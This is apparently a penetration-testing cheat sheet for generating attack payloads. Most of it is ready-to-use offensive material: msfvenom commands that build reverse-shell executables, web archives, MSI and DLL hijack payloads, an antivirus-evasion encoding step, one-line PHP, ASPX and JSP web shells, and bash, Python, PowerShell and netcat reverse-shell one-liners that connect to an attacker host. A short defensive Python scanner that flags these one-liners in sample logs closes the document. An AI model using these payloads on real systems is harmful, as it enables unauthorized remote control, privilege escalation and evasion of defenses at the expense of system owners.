🧪 Payload Generation

msfvenom payloads, web shells, and reverse shell one-liners.

MSFVENOM

Windows reverse shell (staged)

Staged payload — Smaller file, but only the first stage is in the binary, so it needs a Metasploit multi/handler set to the same payload to send the rest

msfvenom -p windows/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe

Windows reverse shell (stageless)

Self-contained payload — The whole shell is in the binary, so a plain nc listener works; larger on disk but more reliable

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f exe -o shell.exe

Linux reverse shell

ELF binary — chmod +x and execute

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f elf -o shell.elf

Java WAR (Tomcat)

Deploy via Tomcat manager — JSP reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f war -o shell.war

ASP/ASPX (IIS)

Upload to IIS web root — Windows web servers

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f asp -o shell.asp
msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f aspx -o shell.aspx

PHP reverse shell

Upload or inject — Most common web shell format

msfvenom -p php/reverse_php LHOST=$LHOST LPORT=4444 -o shell.php

MSI installer (AlwaysInstallElevated)

Abuse misconfigured Windows policy — Runs as SYSTEM

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f msi -o shell.msi
# On target: msiexec /quiet /qn /i shell.msi

DLL hijacking payload

Replace a DLL the service loads — Runs as service account

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o hijack.dll

Encoding to bypass basic AV

Shikata_ga_nai encoder — Multiple iterations; encoding only changes the bytes on disk, and this encoder is well known to modern AV, so expect detection once the payload runs

msfvenom -p windows/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encoded.exe

WEB SHELLS

PHP one-liner

Simplest possible web shell — Upload or inject

<?php system($_GET['cmd']); ?>

PHP reverse shell (Pentest Monkey)

Full interactive reverse shell — Most reliable PHP shell

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
# Edit LHOST and LPORT in the file
# Upload and visit the URL to trigger

ASPX web shell

For IIS servers — Upload to web root

<%@ Page Language="C#" %><%Response.Write(new System.Diagnostics.Process(){StartInfo=new System.Diagnostics.ProcessStartInfo("cmd","/c "+Request["cmd"]){RedirectStandardOutput=true,UseShellExecute=false}}.Start().StandardOutput.ReadToEnd());%>

JSP web shell

For Tomcat/Java servers — Deploy as WAR or upload directly; this one-liner runs the command but does not write its output back to the response

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

REVERSE SHELL ONE-LINERS

Bash

Most reliable on Linux — Try this first; needs bash, since /dev/tcp is a bash feature and is not available under sh/dash

bash -i >& /dev/tcp/$LHOST/4444 0>&1

Python

Available on most Linux systems — Python 2 or 3

python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("$LHOST",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

PowerShell

Windows reverse shell — Encode to bypass restrictions

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$LHOST',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Netcat (with -e)

If nc supports the -e flag (traditional netcat and ncat do, the OpenBSD variant does not) — Simple and reliable

nc -e /bin/bash $LHOST 4444

Netcat (without -e)

FIFO pipe method — Works when nc doesn't have -e

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc $LHOST 4444 >/tmp/f

SHELL UPGRADES

Upgrade to interactive TTY

First thing after catching a shell — Gives tab completion, and Ctrl+C interrupts the remote process instead of killing the shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then Ctrl+Z to background the shell and run the next lines in your local terminal
stty raw -echo; fg
export TERM=xterm
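From the defender's side, every one-liner in the REVERSE SHELL ONE-LINERS section, and the pty upgrade above, leaves a recognisable command line in process-creation telemetry. The following is an added example, not part of the original cheat sheet: a small Python scanner that applies one regex rule per one-liner to constructed sample log lines in an assumed simplified "pid=... user=... cmd=..." format, and includes two benign lines (a Django dev server and an nc port check) to show the rules do not fire on ordinary use of python or nc.

```python
import re

# Constructed sample process-creation log lines in an assumed simplified
# "pid=<n> user=<u> cmd=<command line>" format. Not real telemetry.
SAMPLE_LOGS = [
    'pid=1201 user=www-data cmd=bash -i >& /dev/tcp/10.0.0.5/4444 0>&1',
    'pid=1202 user=www-data cmd=python3 -c \'import socket,subprocess,os;s=socket.socket();s.connect(("10.0.0.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])\'',
    'pid=1203 user=tomcat cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.0.0.5 4444 >/tmp/f',
    'pid=1204 user=app cmd=nc -e /bin/bash 10.0.0.5 4444',
    'pid=1205 user=www-data cmd=python3 -c \'import pty;pty.spawn("/bin/bash")\'',
    'pid=1206 user=alice cmd=python3 manage.py runserver 0.0.0.0:8000',
    'pid=1207 user=root cmd=nc -zv db.internal 5432',
]

# One rule per technique from the cheat sheet: the bash /dev/tcp redirection,
# the python socket+dup2 idiom, the mkfifo|nc pipe, nc with -e pointing at a
# shell, and the pty.spawn TTY upgrade that usually follows a successful catch.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("python_socket_dup2", re.compile(r"socket\.socket\(\).*os\.dup2\(.*fileno\(\)")),
    ("mkfifo_nc_pipe", re.compile(r"mkfifo\s+\S+.*\|\s*nc\s+\S+\s+\d+")),
    ("nc_exec_flag", re.compile(r"\bnc\b.*\s-e\s+\S*sh\b")),
    ("pty_spawn_upgrade", re.compile(r"pty\.spawn\(")),
]

LINE_RE = re.compile(r"pid=(\d+) user=(\S+) cmd=(.*)")

def parse_line(line):
    """Split one log line into pid, user and command line; None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {"pid": int(m.group(1)), "user": m.group(2), "cmd": m.group(3)}

def match_rules(cmd):
    """Return the names of every rule whose pattern appears in the command line."""
    return [name for name, rx in RULES if rx.search(cmd)]

def scan(lines):
    """Return (pid, user, [rule names]) for each line that triggers a rule."""
    alerts = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = match_rules(rec["cmd"])
        if hits:
            alerts.append((rec["pid"], rec["user"], hits))
    return alerts

if __name__ == "__main__":
    for pid, user, hits in scan(SAMPLE_LOGS):
        print(f"ALERT pid={pid} user={user} rules={','.join(hits)}")
```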